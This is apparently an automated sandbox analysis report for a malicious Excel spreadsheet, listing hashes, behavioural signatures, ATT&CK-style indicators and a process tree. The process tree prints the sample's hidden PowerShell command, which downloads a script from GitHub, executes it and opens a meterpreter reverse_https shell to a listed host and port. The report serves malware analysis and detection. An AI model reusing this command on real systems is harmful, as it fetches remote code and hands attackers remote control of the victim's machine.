Analysis
-
max time kernel
24s -
max time network
17s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
10-07-2024 21:50
Behavioral task
behavioral1
Sample
473f5d2bb2e7518268fdb7a9fb439b802ffc4f9aa76ac3fcdbbd60d58cc44dac.xls
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
473f5d2bb2e7518268fdb7a9fb439b802ffc4f9aa76ac3fcdbbd60d58cc44dac.xls
Resource
win10v2004-20240709-en
General
-
Target
473f5d2bb2e7518268fdb7a9fb439b802ffc4f9aa76ac3fcdbbd60d58cc44dac.xls
-
Size
44KB
-
MD5
3d2b24d0a1db0e82fa1f254924128354
-
SHA1
1cecd46eac6c6aadbb5fb6a1869337328400e745
-
SHA256
473f5d2bb2e7518268fdb7a9fb439b802ffc4f9aa76ac3fcdbbd60d58cc44dac
-
SHA512
3a8c459a1d67f69b7558832821cc78a3f4571597a9ce4969edc9aea4947ff791b1fe47206c0ef229c5e3f5d13f632c33358be3198ba260a5123c5fd72d644948
-
SSDEEP
768:Stvo+eUk3hbdlylKsgqopeJBWhZFGkE+cL2NdAJET+juFlmQQcAOJ9acv9acyL:6/k3hbdlylKsgqopeJBWhZFGkE+cL2Ni
Malware Config
Extracted
https://raw.githubusercontent.com/enigma0x3/Generate-Macro/master/Generate-Macro.ps1
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2552 2740 powershell.exe 30 Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 3036 656 wscript.exe 29 -
Blocklisted process makes network request 4 IoCs
flow pid Process 3 2552 powershell.exe 4 2552 powershell.exe 5 840 powershell.exe 6 840 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2552 powershell.exe 840 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
flow ioc 5 raw.githubusercontent.com 6 raw.githubusercontent.com 2 raw.githubusercontent.com 3 raw.githubusercontent.com 4 raw.githubusercontent.com -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Office loads VBA resources, possible macro or embedded object present
-
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 656 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2552 powershell.exe 840 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2552 powershell.exe Token: SeDebugPrivilege 840 powershell.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 656 EXCEL.EXE 656 EXCEL.EXE 656 EXCEL.EXE -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 656 wrote to memory of 3036 656 EXCEL.EXE 33 PID 656 wrote to memory of 3036 656 EXCEL.EXE 33 PID 656 wrote to memory of 3036 656 EXCEL.EXE 33 PID 656 wrote to memory of 3036 656 EXCEL.EXE 33 PID 3036 wrote to memory of 840 3036 wscript.exe 34 PID 3036 wrote to memory of 840 3036 wscript.exe 34 PID 3036 wrote to memory of 840 3036 wscript.exe 34 PID 3036 wrote to memory of 840 3036 wscript.exe 34
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\473f5d2bb2e7518268fdb7a9fb439b802ffc4f9aa76ac3fcdbbd60d58cc44dac.xls1⤵
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:656 -
C:\Windows\SysWOW64\wscript.exewscript C:\Users\Public\config.vbs2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:3036 -
C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -nop -noexit -c IEX ((New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Generate-Macro/master/Generate-Macro.ps1')); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 172.19.240.124 -Lport 1234 -Force3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:840
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden -noprofile -noexit -c IEX ((New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Generate-Macro/master/Generate-Macro.ps1')); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 172.19.240.124 -Lport 1234 -Force1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2552
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZFDFAA2G89Y8RBFL72IM.temp
Filesize7KB
MD582460860ad1a71cb7a0cf84af75ef5e4
SHA1a4f1742fc9d139acc2f8d974ff501a48a9cad1e2
SHA256b158f4e2aabf9dd6534a624cfb9985002a1c5a78abf2b715f823ab20442904b7
SHA512a4911f79ae521b938bcfc82720a4e4cee9846457a19684e7e109cbf13ecefc3a395cd8bfdf2288ab939f8c04a858166b04e756f0b37746bb7ef641819395912d
-
Filesize
461B
MD5ce52ab154163c511f0efa6a61e22ab64
SHA19f12cc215e15802eddcb02cb5370ef16b21fa3a6
SHA256df342167afd4f1758c02b8793b27a2f9e35f074ea20aa1aa75c69d48d88fcd17
SHA512cf50d9b51fcb4f3150aeca158a7a2249b1f5806d0e9ffc2b479ef936a7d85fdaaf302ce5cb3263e03b3c7805d38ca734f167ff757e6b6cdf89343f13a2bf0f78